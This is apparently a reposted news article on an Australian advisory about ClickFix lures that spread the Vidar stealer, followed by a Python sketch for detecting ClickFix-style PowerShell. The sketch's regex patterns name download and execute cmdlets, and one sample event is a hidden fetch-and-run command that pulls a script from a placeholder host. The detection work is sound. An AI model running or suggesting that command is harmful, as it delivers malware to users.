HackMyIP
2026-05-07 BleepingComputer

Australia Warns of ClickFix Attacks Spreading Vidar Stealer

Malware, Phishing, Threat Intel

The Australian Cyber Security Centre (ACSC) has issued a high‑priority advisory warning that a sophisticated malware campaign is actively using the ClickFix social‑engineering technique to deliver Vidar Stealer, a known info‑stealing payload. The campaign has been observed targeting Australian enterprises and government entities, though similar activity has been reported across other regions.

ClickFix lures victims by displaying fake error dialogs or update prompts on compromised websites and in malicious emails. Users are instructed to copy and run a short PowerShell command to “fix” the issue, which in reality downloads and executes the Vidar Stealer loader. This method eliminates the need for exploit kits and relies on human error, making it particularly effective against poorly patched systems.

Once installed, Vidar Stealer harvests a broad range of sensitive data, including browser history, saved credentials, cryptocurrency wallet files, and documents stored on the infected host. The malware exfiltrates the stolen data to attacker‑controlled command‑and‑control (C2) servers, often using encrypted HTTP traffic to evade network detection.

The ACSC recommends immediate mitigations: enforce software patching, disable macro execution in office applications, restrict PowerShell execution through AppLocker or policy controls, and deploy endpoint detection and response solutions capable of identifying anomalous script activity. Organizations are also urged to conduct user awareness training to prevent employees from falling for ClickFix prompts and to report any suspicious artefacts to the ACSC for timely threat intelligence sharing.
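
A sketch of what "identifying anomalous script activity" can look like for this lure, added here as an illustration and not taken from the ACSC advisory or BleepingComputer. It assumes process-creation telemetry already parsed into dicts; the field names, signal list and sample events are constructed, and treating `explorer.exe` as the parent of a pasted command is an assumption about how the user launches it.

```python
import re

# Assumption: events are process-creation records (e.g. Sysmon Event ID 1 or
# Windows 4688 with command-line auditing) already parsed into dicts.
SIGNALS = {
    "download": re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                           r"downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    "execute": re.compile(r"\b(invoke-expression|iex|start-process)\b", re.I),
    "hidden_window": re.compile(r"\s-w\w*\s+h\w*", re.I),   # -w hidden, -WindowStyle Hidden
    "encoded": re.compile(r"\s-e(nc\w*|c)\s", re.I),        # -enc, -EncodedCommand, -ec
}
SHELLS = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # assumed parent when a user pastes and runs a command

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def signals(event):
    """Return the names of the signals present in one process-creation event."""
    if basename(event["image"]) not in SHELLS:
        return []
    hits = [name for name, rx in SIGNALS.items() if rx.search(event["command_line"])]
    if basename(event["parent_image"]) in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    return hits

def is_clickfix_like(event):
    """Fetch-and-run (or encoded) PowerShell that is also user-launched or hidden."""
    hits = set(signals(event))
    fetch_and_run = {"download", "execute"} <= hits or "encoded" in hits
    return fetch_and_run and bool(hits & {"interactive_parent", "hidden_window"})

# Constructed sample events; hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://example.invalid/fix.ps1)"'},
    {"parent_image": r"C:\Program Files\Agent\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh.exe"},  # a user simply opening a console
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix_like(ev), signals(ev), ev["command_line"])
```

The third event shows why the parent process alone is not enough: an interactively opened console shares the parent but carries no fetch-and-run content, so it is not flagged.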

Source: BleepingComputer
